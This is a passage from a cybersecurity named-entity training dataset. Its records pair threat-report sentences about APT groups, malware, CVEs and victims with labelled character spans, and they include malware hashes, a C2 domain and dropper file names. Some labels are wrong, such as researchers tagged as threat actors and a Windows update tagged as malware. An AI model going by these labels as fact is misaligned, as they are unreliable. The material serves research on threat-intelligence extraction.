463]], "MALWARE: MiniDuke": [[478, 486]], "MALWARE: CosmicDuke": [[489, 499]], "ORGANIZATION: targeting government": [[542, 562]], "ORGANIZATION: diplomatic , energy , military and telecom operators": [[565, 617]]}, "info": {"id": "cyberner_stix_train_002512", "source": "cyberner_stix_train"}} {"text": "We watched WolfRAT evolve through various iterations which shows that the actor wanted to ensure functional improvements — perhaps they had deadlines to meet for their customers , but with no thought given to removing old 
code blocks , classes , etc . It is highly likely MoonWind is yet another new tool being used by the group or groups responsible for that activity , indicating they are not only still active but continuing to evolve their playbook . These changes may be temporary and FireEye believes they are aimed at decreasing detection of their tools until a more permanent and effective TTP change can be implemented ( e.g. , WATERSPOUT ) . The threat actors are distributing NetSupport RAT either as a zipped download or via an Internet shortcut .", "spans": {"MALWARE: WolfRAT": [[11, 18]], "TOOL: MoonWind": [[272, 280]], "ORGANIZATION: FireEye": [[490, 497]], "MALWARE: WATERSPOUT": [[637, 647]], "THREAT_ACTOR: threat actors": [[656, 669]], "TOOL: NetSupport RAT": [[687, 701]]}, "info": {"id": "cyberner_stix_train_002513", "source": "cyberner_stix_train"}} {"text": "HenBox appears to primarily target the Uyghurs – a minority Turkic ethnic group that is primarily Muslim and lives mainly in the Xinjiang Uyghur Autonomous Region in North West China . This full-blown spying framework consists of two packages named ‘Tokyo’ and ‘Yokohama’ . 
The APT actor , active since 2008 , has been seen targeting organizations in the financial services , telecoms , government , and defense sectors .", "spans": {"MALWARE: HenBox": [[0, 6]], "MALWARE: ‘Tokyo’": [[249, 256]], "MALWARE: ‘Yokohama’": [[261, 271]], "THREAT_ACTOR: APT actor": [[278, 287]], "ORGANIZATION: financial services": [[355, 373]], "ORGANIZATION: telecoms": [[376, 384]], "ORGANIZATION: government": [[387, 397]], "ORGANIZATION: defense sectors": [[404, 419]]}, "info": {"id": "cyberner_stix_train_002514", "source": "cyberner_stix_train"}} {"text": "It then loads the contents of the encrypted file and injects it into the explorer.exe and iexplore.exe processes .", "spans": {"FILEPATH: explorer.exe": [[73, 85]], "FILEPATH: iexplore.exe": [[90, 102]]}, "info": {"id": "cyberner_stix_train_002515", "source": "cyberner_stix_train"}} {"text": "Alpha’s early role was fairly simple: engage with individuals , who he chose based on the goods they were selling , and then provide personal shipping addresses back to Omega . In this report , we'll review how the actors attempted to exploit CVE-2012-0158 to install the NetTraveler Trojan .", "spans": {"THREAT_ACTOR: Alpha’s": [[0, 7]], "VULNERABILITY: exploit": [[235, 242]], "VULNERABILITY: CVE-2012-0158": [[243, 256]], "MALWARE: NetTraveler Trojan": [[272, 290]]}, "info": {"id": "cyberner_stix_train_002516", "source": "cyberner_stix_train"}} {"text": "In Clever Kitten 's attacks , the goal is lateral movement ; this is an attempt to move further into the target environment in order to begin intelligence collection . CTU researchers have observed the Threat Group-3390 obtaining information about specific U.S. defense projects that would be desirable to those operating within a country with a manufacturing base , an interest in U.S. military capability , or both .", "spans": {"ORGANIZATION: CTU": [[168, 171]], "THREAT_ACTOR: Group-3390": [[209, 219]], "ORGANIZATION: U.S. 
defense": [[257, 269]], "ORGANIZATION: military capability": [[387, 406]]}, "info": {"id": "cyberner_stix_train_002517", "source": "cyberner_stix_train"}} {"text": "Upon further inspection , we have observed that this RAT extracts WhatsApp data too . An APT gang linked to China and alleged to be responsible for targeted attacks against foreign governments and ministries , has now pointed its focus inward at China autonomous territory Hong Kong . Name SHA256 . If more groups start adopting CL0P 's zero - day exploitation techniques , the ransomware landscape could tilt from service - oriented attacks to a more aggressive , vulnerability - focused model — a move that could skyrocket the impact of attacks .", "spans": {"SYSTEM: WhatsApp": [[66, 74]], "THREAT_ACTOR: APT gang": [[89, 97]], "ORGANIZATION: governments": [[181, 192]], "THREAT_ACTOR: groups": [[307, 313]], "MALWARE: ransomware": [[378, 388]]}, "info": {"id": "cyberner_stix_train_002518", "source": "cyberner_stix_train"}} {"text": "The domain was registered on March 8th , 2013 : Registration Service Provided By : SHANGHAI MEICHENG TECHNOLOGY INFORMATION DEVELOPMENT CO. , LTD. Domain Name : DLMDOCUMENTSEXCHANGE.COM Registration Date : 08-Mar-2013 Expiration Date : 08-Mar-2014 Status : LOCKED The domain registration data indicates the following owner : Registrant Contact Details : peng jia peng jia ( bdoufwke123010 @ gmail.com ) beijingshiahiidienquc.d beijingshi beijing,100000 While we were unable to recover the initial vulnerability used , it is possibly the same CVE-2014-0515 Adobe Flash exploit first reported by Cisco TRAC in late July . The discovery by Kaspersky marks at least the fifth zero-day exploit used by BlackOasis and exposed by security researchers since June 2015 .", "spans": {"ORGANIZATION: SHANGHAI MEICHENG TECHNOLOGY INFORMATION DEVELOPMENT CO. 
, LTD.": [[83, 146]], "VULNERABILITY: CVE-2014-0515": [[542, 555]], "VULNERABILITY: Adobe Flash exploit": [[556, 575]], "ORGANIZATION: Cisco TRAC": [[594, 604]], "ORGANIZATION: Kaspersky": [[637, 646]], "VULNERABILITY: zero-day": [[672, 680]], "VULNERABILITY: exploit": [[681, 688]], "THREAT_ACTOR: BlackOasis": [[697, 707]]}, "info": {"id": "cyberner_stix_train_002519", "source": "cyberner_stix_train"}} {"text": "] com nampriknum [ . In August and October 2016 we observed a malware operation targeting members of the Tibetan Parliament ( the highest legislative organ of the Tibetan government in exile , formally known as Central Tibetan Administration ) . These threat actors ’ tactics follow the same principles of evolution – successful techniques propagate , and unsuccessful ones are abandoned . The RAT 's main binary is launched from \" C:\\Users\\%username%\\AppData\\Roaming\\BranScale\\client32.exe \" .", "spans": {"ORGANIZATION: Tibetan Parliament": [[105, 123]], "ORGANIZATION: Tibetan government": [[163, 181]], "ORGANIZATION: Central Tibetan Administration": [[211, 241]]}, "info": {"id": "cyberner_stix_train_002520", "source": "cyberner_stix_train"}} {"text": "C & C Communications Exfiltrating Device Data To communicate with its master , TrickMo ’ s code contains a hardcoded URL of the C & C server . Emotet is a type of general-purpose malware that evolved from a well-known banking Trojan , \" Cridex \" , which was first discovered in 2014 . 
During the summer of 2018 , HELIX KITTEN actors were observed targeting entities in the Middle East — of note , targets appeared to be located in Bahrain and Kuwait .", "spans": {"MALWARE: TrickMo": [[79, 86]], "TOOL: Emotet": [[143, 149]], "TOOL: banking Trojan": [[218, 232]], "TOOL: Cridex": [[237, 243]], "THREAT_ACTOR: HELIX KITTEN actors": [[313, 332]]}, "info": {"id": "cyberner_stix_train_002521", "source": "cyberner_stix_train"}} {"text": "In addition to the continued evolution of the group ’s first stage tools , we have also noted APT28 : Leveraging zero-day vulnerabilities in Adobe Flash Player , Java , and Windows , including CVE-2015-1701 , CVE-2015-2424 , CVE-2015-2590 , CVE-2015-3043 , CVE-2015-5119 , and CVE-2015-7645 .", "spans": {"THREAT_ACTOR: APT28": [[94, 99]], "VULNERABILITY: zero-day": [[113, 121]], "ORGANIZATION: Adobe": [[141, 146]], "TOOL: Flash": [[147, 152]], "TOOL: Player": [[153, 159]], "TOOL: Java": [[162, 166]], "SYSTEM: Windows": [[173, 180]], "VULNERABILITY: CVE-2015-1701": [[193, 206]], "VULNERABILITY: CVE-2015-2424": [[209, 222]], "VULNERABILITY: CVE-2015-2590": [[225, 238]], "VULNERABILITY: CVE-2015-3043": [[241, 254]], "VULNERABILITY: CVE-2015-5119": [[257, 270]], "VULNERABILITY: CVE-2015-7645": [[277, 290]]}, "info": {"id": "cyberner_stix_train_002522", "source": "cyberner_stix_train"}} {"text": "No other parts of the C2 infrastructure amongst these domains contained any overlapping artifacts .", "spans": {"TOOL: C2": [[22, 24]]}, "info": {"id": "cyberner_stix_train_002523", "source": "cyberner_stix_train"}} {"text": "One of these files was deployed in a TEMP.Veles target ’s network .", "spans": {"THREAT_ACTOR: TEMP.Veles": [[37, 47]]}, "info": {"id": "cyberner_stix_train_002524", "source": "cyberner_stix_train"}} {"text": "On January 10 , 2020 , we used Shodan to search for Internet accessible servers running versions of SharePoint vulnerable to CVE-2019-0604 .", "spans": {"TOOL: Shodan": [[31, 37]], "TOOL: SharePoint": [[100, 
110]], "VULNERABILITY: CVE-2019-0604": [[125, 138]]}, "info": {"id": "cyberner_stix_train_002525", "source": "cyberner_stix_train"}} {"text": "The actor can even take his malicious activities to the next level by installing a remote application from a designated server , thus allowing him to install new malware once it is required . Gallmaker used lure documents attempt to exploit the Microsoft Office Dynamic Data Exchange ( DDE ) protocol in order to gain access to victim machines . By targeting all of these organizations together , Suckfly could have had a much larger impact on India and its economy .", "spans": {"THREAT_ACTOR: Gallmaker": [[192, 201]]}, "info": {"id": "cyberner_stix_train_002526", "source": "cyberner_stix_train"}} {"text": "The following are the DBs created and maintained by the RAT . The agroup targeting Hong Kong media outlets is called admin@338 and is known to researchers for using publicly available remote access Trojans such as Poison Ivy to attack government and financial firms specializing in global economic policy . 558.doc , 2.doc: 2869664d456034a611b90500f0503d7d6a64abf62d9f9dd432a8659fa6659a84 . 
CrowdStrike researchers replicated the exploit method attack on Exchange systems that had not received the November 8 , 2022 patch KB5019758 , but could not replicate the attack on systems that had received that patch .", "spans": {"THREAT_ACTOR: agroup": [[66, 72]], "ORGANIZATION: media": [[93, 98]], "THREAT_ACTOR: admin@338": [[117, 126]], "TOOL: remote access Trojans": [[184, 205]], "TOOL: Poison Ivy": [[214, 224]], "ORGANIZATION: government": [[235, 245]], "ORGANIZATION: financial firms": [[250, 265]], "ORGANIZATION: global economic": [[282, 297]], "FILEPATH: 558.doc": [[307, 314]], "FILEPATH: 2869664d456034a611b90500f0503d7d6a64abf62d9f9dd432a8659fa6659a84": [[324, 388]], "THREAT_ACTOR: CrowdStrike researchers": [[391, 414]], "VULNERABILITY: KB5019758": [[522, 531]]}, "info": {"id": "cyberner_stix_train_002527", "source": "cyberner_stix_train"}} {"text": "The main reason for developers to choose SMS over traditional payments via Internet is that in the case with SMS no Internet connection is required . Another set of attacks called Operation Erebus leverages another Flash exploit , CVE-2016-4117 , and relies on watering hole attacks as a means of propagation . Additionally , the scope of organizations targeted by this group has expanded to not only include organizations within Saudi Arabia , but also a company in Qatar and government organizations in Turkey , Israel and the United States .", "spans": {"VULNERABILITY: Flash exploit": [[215, 228]], "VULNERABILITY: CVE-2016-4117": [[231, 244]], "ORGANIZATION: government organizations": [[477, 501]]}, "info": {"id": "cyberner_stix_train_002528", "source": "cyberner_stix_train"}} {"text": "The OilRig group conducts operations primarily in the Middle East , targeting financial , government , energy , chemical , telecommunications and other industries . 
\" IRIDIUM has hit more than 200 government agencies , oil and gas companies and technology companies , including Citrix Systems Inc \" , they said .", "spans": {"THREAT_ACTOR: OilRig group": [[4, 16]], "ORGANIZATION: financial": [[78, 87]], "ORGANIZATION: government": [[90, 100]], "ORGANIZATION: energy": [[103, 109]], "ORGANIZATION: chemical": [[112, 120]], "ORGANIZATION: telecommunications": [[123, 141]], "ORGANIZATION: government agencies": [[197, 216]], "ORGANIZATION: oil": [[219, 222]], "ORGANIZATION: gas companies": [[227, 240]], "ORGANIZATION: technology companies": [[245, 265]], "ORGANIZATION: Citrix Systems Inc": [[278, 296]]}, "info": {"id": "cyberner_stix_train_002529", "source": "cyberner_stix_train"}} {"text": "However , several of the collected samples were a C++ variant of the Zebrocy downloader tool .", "spans": {"TOOL: C++": [[50, 53]], "MALWARE: Zebrocy": [[69, 76]]}, "info": {"id": "cyberner_stix_train_002530", "source": "cyberner_stix_train"}} {"text": "Then it adds onTouchListener to this textView and is able to process every user tap . Volgmer is a backdoor Trojan designed to provide covert access to a compromised system . APT33 : 94526e2d1aca581121bd79a699a3bf5e4d91a4f285c8ef5ab2ab6e9e44783997 S-SHA2 PowerShell downloader ( registry.ps1 ) . Ideology", "spans": {"TOOL: Volgmer": [[86, 93]], "TOOL: backdoor Trojan": [[99, 114]], "THREAT_ACTOR: APT33": [[175, 180]], "MALWARE: 94526e2d1aca581121bd79a699a3bf5e4d91a4f285c8ef5ab2ab6e9e44783997 S-SHA2 PowerShell downloader": [[183, 276]], "MALWARE: registry.ps1": [[279, 291]]}, "info": {"id": "cyberner_stix_train_002531", "source": "cyberner_stix_train"}} {"text": "However , our data suggests that there have been at least 2,729 infections between January 2016 and early April 2016 , with a peak in March of more than 1,100 infections . 
The Operation Aurora , named by McAfee and announced in January 2010 , and the WikiLeaks document disclosures of 2010 have highlighted the fact that external and internal threats are nearly impossible to prevent . Ssdeep : 24576:zXwOrRsTQlIIIIwIEuCRqKlF8kmh/ZGg4kAL/WUKN7UMOtcv : zgwR/lIIIIwI6RqoukmhxGgZ+WUKZUMv . Mandiant has tracked KillNet activity back to January 2022 , despite a claim by the collective ’s alleged founder that it began operations in 2021 .", "spans": {"ORGANIZATION: McAfee": [[204, 210]], "ORGANIZATION: WikiLeaks": [[251, 260]], "TOOL: Ssdeep": [[386, 392]], "ORGANIZATION: Mandiant": [[487, 495]]}, "info": {"id": "cyberner_stix_train_002532", "source": "cyberner_stix_train"}} {"text": "It is unclear whether this means early samples were targeting Arabic speakers or if the developers behind it are fluent in Arabic . For a long time the Winnti group had been considered as a Chinese threat actor targeting gaming companies specifically . The buffer containing the ZxShell Dll in the new location is freed using the VirtualFree API function . FREEFIRE communicates to a hard - coded channel to retrieve commands and upload responses .", "spans": {"THREAT_ACTOR: Winnti group": [[152, 164]], "ORGANIZATION: gaming companies": [[221, 237]], "MALWARE: ZxShell": [[279, 286]], "TOOL: Dll": [[287, 290]], "MALWARE: FREEFIRE": [[357, 365]]}, "info": {"id": "cyberner_stix_train_002533", "source": "cyberner_stix_train"}} {"text": "ORat — CTU researchers have only observed this basic loader tool in the context of BRONZE PRESIDENT intrusions .", "spans": {"MALWARE: ORat": [[0, 4]], "ORGANIZATION: CTU": [[7, 10]], "THREAT_ACTOR: BRONZE PRESIDENT": [[83, 99]]}, "info": {"id": "cyberner_stix_train_002534", "source": "cyberner_stix_train"}} {"text": "For Google , Android security issues - even if not in the core operating code - are a reputation threat , and for Amazon , a product quality issue . 
Upon decrypting and executing , it drops two additional files wsc_proxy.exe (legitimate Avast executable) and a malicious DLL wsc.dll in the %TEMP% folder . C2 : psfir.sacreeflame.com .", "spans": {"ORGANIZATION: Google": [[4, 10]], "ORGANIZATION: Amazon": [[114, 120]], "MALWARE: wsc_proxy.exe": [[211, 224]], "MALWARE: wsc.dll": [[275, 282]], "TOOL: C2": [[306, 308]], "DOMAIN: psfir.sacreeflame.com": [[311, 332]]}, "info": {"id": "cyberner_stix_train_002535", "source": "cyberner_stix_train"}} {"text": "The first sighting of three of the nine stolen certificates being used maliciously occurred in early 2014 .", "spans": {}, "info": {"id": "cyberner_stix_train_002536", "source": "cyberner_stix_train"}} {"text": "Having the ability to move code from desktops to mobile platforms with no effort , like the eCommon.DLL demonstrates that malicious actors can create hybrid threats faster and with fewer resources involved than ever before . Password spraying , DNS tunneling , social engineering , and abuse of security testing frameworks are common tactics , particularly from threat groups operating in the Middle East . While North Korean cyber operations against specific countries may have been driven by diplomatic factors and perceived insults against Pyongyang , the application of increasingly restrictive and numerous financial sanctions against North Korea probably contributed to the formation of APT38 .", "spans": {"THREAT_ACTOR: groups": [[369, 375]], "ORGANIZATION: financial": [[612, 621]], "THREAT_ACTOR: APT38": [[693, 698]]}, "info": {"id": "cyberner_stix_train_002537", "source": "cyberner_stix_train"}} {"text": "Nowadays , script kiddies can build a piece of malware that can create real havoc . Hackers are targeting high-tech companies as well as chemical and pharmaceutical companies . 
CopyKittens often uses the trial version of Cobalt Strike , a publicly available commercial software for \" Adversary Simulations and Red Team Operations \" .", "spans": {"THREAT_ACTOR: Hackers": [[84, 91]], "ORGANIZATION: high-tech companies": [[106, 125]], "ORGANIZATION: chemical": [[137, 145]], "ORGANIZATION: pharmaceutical": [[150, 164]], "THREAT_ACTOR: CopyKittens": [[177, 188]], "MALWARE: Cobalt Strike": [[221, 234]]}, "info": {"id": "cyberner_stix_train_002538", "source": "cyberner_stix_train"}} {"text": "This group has used a large array of infection vectors , mostly revolving around drive-by downloads and spam . In the past , Scarlet Mimic has primarily targeted individuals who belong to these minority groups as well as their supporters , but we've recently found evidence to indicate the group also targets individuals working inside government anti-terrorist organizations .", "spans": {"THREAT_ACTOR: group": [[5, 10]], "THREAT_ACTOR: Scarlet Mimic": [[125, 138]], "ORGANIZATION: minority groups": [[194, 209]], "ORGANIZATION: supporters": [[227, 237]], "ORGANIZATION: anti-terrorist organizations": [[347, 375]]}, "info": {"id": "cyberner_stix_train_002539", "source": "cyberner_stix_train"}} {"text": "The last step of the activation cycle is the download of a password-protected ZIP file . The group mainly targets the telecommunications and IT services sectors . Derusbi : Compile Date and Time : 2012-09-14 09:20:12 AM . 
But then , following an upsurge in attacks in the second half of 2014 , GReAT characterized MiniDuke , CosmicDuke and the actor ’s Nemesis Gemina project - targeting government , diplomatic , energy , military and telecom operators - as ‘ one of the world ’s most unusual APT operations ’ due to : • Its use of a customized backdoor written in Assembler using ‘ old school ’ virus writing techniques and habits • Stealthy transfer of updates as executables hidden inside GIF files ( a form of steganography )", "spans": {"THREAT_ACTOR: group": [[93, 98]], "ORGANIZATION: telecommunications": [[118, 136]], "ORGANIZATION: IT services sectors": [[141, 160]], "MALWARE: Derusbi": [[163, 170]], "ORGANIZATION: GReAT": [[294, 299]], "MALWARE: MiniDuke": [[314, 322]], "MALWARE: CosmicDuke": [[325, 335]], "ORGANIZATION: targeting government": [[378, 398]], "ORGANIZATION: diplomatic , energy , military and telecom operators": [[401, 453]]}, "info": {"id": "cyberner_stix_train_002540", "source": "cyberner_stix_train"}} {"text": "Each time a rented malware reaches the end of its life it provides the opportunity for other actors a to take over the malware rental market-share . Attackers take advantage of that , along with their knowledge of military jargon and etiquette , to craft very convincing phishing emails . 
Based on details published in the DOJ complaint against North Korean programmer Park Jin Hyok , we know that APT38 and other cyber operators linked to TEMP.Hermit are associated with Lab 110 , an organization subordinate to or synonymous with the 6th Technical Bureau in North Korea 's Reconnaissance General Bureau ( RGB ) .", "spans": {"THREAT_ACTOR: Attackers": [[149, 158]], "ORGANIZATION: military": [[214, 222]], "THREAT_ACTOR: APT38": [[398, 403]], "THREAT_ACTOR: cyber operators": [[414, 429]], "THREAT_ACTOR: TEMP.Hermit": [[440, 451]], "ORGANIZATION: Lab 110": [[472, 479]], "ORGANIZATION: Reconnaissance General Bureau": [[575, 604]], "ORGANIZATION: RGB": [[607, 610]]}, "info": {"id": "cyberner_stix_train_002541", "source": "cyberner_stix_train"}} {"text": "In the 2016 incident , the victim was compromised after connecting to a hotel Wi-Fi network .", "spans": {"TOOL: Wi-Fi network": [[78, 91]]}, "info": {"id": "cyberner_stix_train_002542", "source": "cyberner_stix_train"}} {"text": "Mozilla ( Windows NT 6.1 ; WOW64 ) WinHttp/1.6.3.8 ( WinHTTP/5.1 ) like Gecko .", "spans": {"ORGANIZATION: Mozilla": [[0, 7]], "SYSTEM: Windows": [[10, 17]], "TOOL: Gecko": [[72, 77]]}, "info": {"id": "cyberner_stix_train_002543", "source": "cyberner_stix_train"}} {"text": "] 205 [ . As we now know , by February 2013 the Dukes group had been operating MiniDuke and other toolsets for at least 4 and a half years . The first payload that is downloaded via the DownloadString method highlighted above , is a PowerShell one-liner that uses an IF statement to evaluate the architecture of the compromised system , and then downloads a additional payload from pastebin.com . 
In the case of the exploit method described here as OWASSRF , the endpoint is not used , in lieu , and the request will not be dropped .", "spans": {"THREAT_ACTOR: Dukes group": [[48, 59]], "TOOL: MiniDuke": [[79, 87]], "TOOL: DownloadString": [[186, 200]], "TOOL: PowerShell": [[233, 243]], "DOMAIN: pastebin.com": [[382, 394]]}, "info": {"id": "cyberner_stix_train_002544", "source": "cyberner_stix_train"}} {"text": "The geographic distribution of these IP addresses ( image 8 , page 13 ) further supports our theory that the purpose of this OnionDuke variant was not targeted attacks against high-profile targets .", "spans": {"MALWARE: OnionDuke": [[125, 134]]}, "info": {"id": "cyberner_stix_train_002545", "source": "cyberner_stix_train"}} {"text": "Antonov's group included Ivan Sergeyevich Yermakov and Senior Lieutenant Aleksey Viktorovich Lukashev , according to the indictment , and they were responsible for targeting the email accounts that were exposed on the \" DCLeaks \" site prior to the election operations .", "spans": {"TOOL: email": [[178, 183]], "THREAT_ACTOR: DCLeaks": [[220, 227]]}, "info": {"id": "cyberner_stix_train_002546", "source": "cyberner_stix_train"}} {"text": "To deliver their malware , the cyber criminals use spearphishing emails with various types of attachments: MS Office documents or spreadsheet files exploiting some known vulnerability like CVE-2017-11882 , or documents with Ole2Link and SCT . 
The executable would install the real Ammyy product , but would also launch a file called either AmmyyService.exe or AmmyySvc.exe which contained the malicious payload .", "spans": {"THREAT_ACTOR: cyber criminals": [[31, 46]], "TOOL: spearphishing emails": [[51, 71]], "TOOL: attachments:": [[94, 106]], "TOOL: documents": [[117, 126], [209, 218]], "VULNERABILITY: CVE-2017-11882": [[189, 203]], "FILEPATH: AmmyyService.exe": [[340, 356]], "FILEPATH: AmmyySvc.exe": [[360, 372]]}, "info": {"id": "cyberner_stix_train_002547", "source": "cyberner_stix_train"}} {"text": "] cashnow [ . RATs such as NjRat and infostealers like Lokibot were leveraging the same C2 infrastructure as that of the targeted attacks . Some functions in the ANEL sample utilize this , As these attacks continue to grow , security teams need tools to help save time and address the threats more effectively .", "spans": {"TOOL: RATs": [[14, 18]], "TOOL: NjRat": [[27, 32]], "TOOL: Lokibot": [[55, 62]], "MALWARE: ANEL": [[162, 166]], "ORGANIZATION: security teams": [[225, 239]]}, "info": {"id": "cyberner_stix_train_002548", "source": "cyberner_stix_train"}} {"text": "] ir . In recent APT incidents , Dark Hydruns tend to adopt Office VBA macro instead of Office 0day vulnerability in the consideration of cost reduction . 
ScarCruft tools : 22aaf617a86e026424edb7c868742495 AV Remover .", "spans": {"THREAT_ACTOR: Dark Hydruns": [[33, 45]], "TOOL: Office VBA macro": [[60, 76]], "THREAT_ACTOR: ScarCruft": [[155, 164]], "FILEPATH: 22aaf617a86e026424edb7c868742495": [[173, 205]], "TOOL: AV Remover": [[206, 216]]}, "info": {"id": "cyberner_stix_train_002549", "source": "cyberner_stix_train"}} {"text": "During one intrusion , the threat actors gained administrator access to all systems within a targeted business unit and installed their remote access tools on 80% of the hosts .", "spans": {}, "info": {"id": "cyberner_stix_train_002550", "source": "cyberner_stix_train"}} {"text": "The threat actors used two publicly available techniques , an AppLocker whitelisting bypass and a script to inject shellcode into the userinit.exe process . The Windows 10 Creators Update will bring several enhancements to Windows Defender ATP that will provide SOC personnel with options for immediate mitigation of a detected threat .", "spans": {"THREAT_ACTOR: actors": [[11, 17]], "MALWARE: userinit.exe": [[134, 146]], "MALWARE: Windows 10 Creators Update": [[161, 187]], "ORGANIZATION: Windows Defender ATP": [[223, 243]], "ORGANIZATION: SOC personnel": [[262, 275]]}, "info": {"id": "cyberner_stix_train_002551", "source": "cyberner_stix_train"}} {"text": "The function “ NvMswt ” is a wrapper for the API function MsgWaitForMultipleObjects .", "spans": {}, "info": {"id": "cyberner_stix_train_002552", "source": "cyberner_stix_train"}} {"text": "Apps of the Android/AdDisplay.Ashas family reported to Google by ESET Figure 2 . ESET recently uncovered a new addition to OceanLotus’s toolset targeting Mac OS . 
This URI is used with a new feature implemented in this version: the malware is able to perform screenshot (thanks to the GDI API) and uploads it thank to this URL .", "spans": {"MALWARE: Android/AdDisplay.Ashas": [[12, 35]], "ORGANIZATION: ESET": [[65, 69], [81, 85]], "THREAT_ACTOR: OceanLotus’s": [[123, 135]]}, "info": {"id": "cyberner_stix_train_002553", "source": "cyberner_stix_train"}} {"text": "Although the complete list of Shamoon ’s victims is not public , Bloomberg reported that in one case , thousands of computers were destroyed at the headquarters of Saudi ’s General Authority of Civil Aviation , erasing critical data and bringing operations to a halt for several days .", "spans": {"MALWARE: Shamoon": [[30, 37]], "ORGANIZATION: Saudi ’s General Authority of Civil Aviation": [[164, 208]]}, "info": {"id": "cyberner_stix_train_002554", "source": "cyberner_stix_train"}} {"text": "We were also able to link the FrozenCell 's Android infrastructure to numerous desktop samples that are part of the larger multi-platform attack . Symantec during 2012 linked the Elderwood Project to Operation Aurora ; Trojan.Naid and Backdoor.Moudoor were also used in Aurora , by the Elderwood Gang , and by Hidden Lynx . Because the commands are usually encoded and difficult to spell from memory , APT1 intruders typically do not type these strings , but instead copy and paste them into the HTML files . 
Instead , they can make money by marketing their services to other bad actors for a fee .", "spans": {"MALWARE: FrozenCell": [[30, 40]], "SYSTEM: Android": [[44, 51]], "ORGANIZATION: Symantec": [[147, 155]], "TOOL: Trojan.Naid": [[219, 230]], "MALWARE: Backdoor.Moudoor": [[235, 251]], "TOOL: Aurora": [[270, 276]], "THREAT_ACTOR: Elderwood Gang": [[286, 300]], "THREAT_ACTOR: Hidden Lynx": [[310, 321]], "THREAT_ACTOR: APT1": [[402, 406]], "TOOL: HTML": [[496, 500]]}, "info": {"id": "cyberner_stix_train_002555", "source": "cyberner_stix_train"}} {"text": "It appears to have started in December 2015 and is still ongoing as of July 2016 . The name Mofang is based on the Mandarin verb , which means to imitate .", "spans": {"THREAT_ACTOR: Mofang": [[92, 98]]}, "info": {"id": "cyberner_stix_train_002556", "source": "cyberner_stix_train"}} {"text": "The malicious apps reached an astonishing spread between 4.5 million and 18.5 million downloads . The samples Novetta obtained from the active Axiom infection were compiled in mid- to late 2014 and represent what Novetta is referring to as version 3.0 of the Winnti lineage . Otherwise , the plugin is added to an internal list . The directory choices and naming conventions of the Ruby script and second stage payloads indicated the threat actor placed significant priority into masquerading as legitimate files and applications .", "spans": {"ORGANIZATION: Novetta": [[110, 117], [213, 220]], "THREAT_ACTOR: Winnti": [[259, 265]], "MALWARE: Ruby script": [[382, 393]], "MALWARE: second stage payloads": [[398, 419]]}, "info": {"id": "cyberner_stix_train_002557", "source": "cyberner_stix_train"}} {"text": "The samples sharing this overlap are modified versions of an open source Jabber/XMPP client called “ Conversations ” with some code additions . 
BlackEnergy is a highly dynamic threat actor and the current attacks in Ukraine indicate that destructive actions are on their main agenda , in addition to compromising industrial control installations and espionage activities . The fact that this victim visits North Korea makes its special and suggests that it may have valuable information about North Korean affairs .", "spans": {"SYSTEM: Jabber/XMPP": [[73, 84]], "THREAT_ACTOR: BlackEnergy": [[144, 155]]}, "info": {"id": "cyberner_stix_train_002558", "source": "cyberner_stix_train"}} {"text": "If root access is obtained , the application downloads a malicious .apk file ( The Backdoor ) from the server and installs it as system application . Older documents used by Patchwork focused on the CVE-2017-0261 vulnerability , however in late January 2018 when , paradoxically , newer documents abandoned this vulnerability to attack the older CVE-2015-2545 vulnerability . APT10 is a constantly evolving , highly persistent China-based threat actor that has an ambitious and unprecedented collection programme against a broad spectrum of sectors , enabled by its strategic targeting .", "spans": {"THREAT_ACTOR: Patchwork": [[174, 183]], "VULNERABILITY: CVE-2017-0261": [[199, 212]], "VULNERABILITY: CVE-2015-2545": [[346, 359]], "THREAT_ACTOR: APT10": [[376, 381]]}, "info": {"id": "cyberner_stix_train_002559", "source": "cyberner_stix_train"}} {"text": "It has not been confirmed whether these are from test devices or the devices of victims . The above network shows relationships between three tools used by Hidden Lynx during its VOHO campaign : Trojan.Naid , Backdoor.Moudoor , and Backdoor.Hikit . We have observed APT1 intruders logging in to WEBC2 servers and manually editing the HTML pages that backdoors will download . 
Usually , they ’d have to hope a successful attack leads to a ransom payment or some sort of other financial windfall .", "spans": {"TOOL: Trojan.Naid": [[195, 206]], "MALWARE: Backdoor.Moudoor": [[209, 225]], "TOOL: Backdoor.Hikit": [[232, 246]], "THREAT_ACTOR: APT1": [[266, 270]], "MALWARE: WEBC2": [[295, 300]], "TOOL: HTML": [[334, 338]]}, "info": {"id": "cyberner_stix_train_002560", "source": "cyberner_stix_train"}} {"text": "If the response code from the C2 server is 200 , the malware decrypts the payload and loads it in memory .", "spans": {"TOOL: C2": [[30, 32]]}, "info": {"id": "cyberner_stix_train_002561", "source": "cyberner_stix_train"}} {"text": "The adversaries modify publicly available tools such as ASPXSpy to remove identifying characteristics that network defenders use to identify web shells .", "spans": {"MALWARE: ASPXSpy": [[56, 63]], "TOOL: web shells": [[141, 151]]}, "info": {"id": "cyberner_stix_train_002562", "source": "cyberner_stix_train"}} {"text": "Additional digests with links to Chrysaor As a result of our investigation we have identified these additional Chrysaor-related apps . We believe APT40 's emphasis on maritime issues and naval technology ultimately support China 's ambition to establish a blue-water navy . Winnti : infestexe.com 2018-11-07 08:46:44 https://www.facebook.com/infest.in.th . 
• Unauthorized network connections to MSSQL servers ( TCP/1433 ) and irregular or unauthorized authentication .", "spans": {"MALWARE: Chrysaor": [[33, 41]], "MALWARE: Chrysaor-related": [[111, 127]], "THREAT_ACTOR: APT40": [[146, 151]], "ORGANIZATION: naval technology": [[187, 203]], "THREAT_ACTOR: Winnti": [[274, 280]], "DOMAIN: infestexe.com": [[283, 296]], "URL: https://www.facebook.com/infest.in.th": [[317, 354]]}, "info": {"id": "cyberner_stix_train_002563", "source": "cyberner_stix_train"}} {"text": "DLL side loading is often used to maintain persistence on the compromised system .", "spans": {"TOOL: DLL": [[0, 3]]}, "info": {"id": "cyberner_stix_train_002564", "source": "cyberner_stix_train"}} {"text": "com.comarch.mobile com.jpm.sig.android com.konylabs.cbplpat by.belinvestbank no.apps.dnbnor com.arkea.phonegap com.alseda.bpssberbank com.belveb.belvebmobile com.finanteq.finance.ca pl.eurobank pl.eurobank2 pl.noblebank.mobile com.getingroup.mobilebanking hr.asseco.android.mtoken.getin pl.getinleasing.mobile com.icp.ikasa.getinon Operator X also took advantage of cultural idiosyncrasies in its target countries , for example , the regular and widely accepted use of personal Gmail accounts for work . Cyberwarfare : A deep dive into the latest Gamaredon Espionage Campaign . The memory dump file can be processed offline by the threat actor to extract credentials .", "spans": {"THREAT_ACTOR: Gamaredon": [[547, 556]]}, "info": {"id": "cyberner_stix_train_002565", "source": "cyberner_stix_train"}} {"text": "We believe that the Carbanak campaign is a clear indicator of a new era in cybercrime 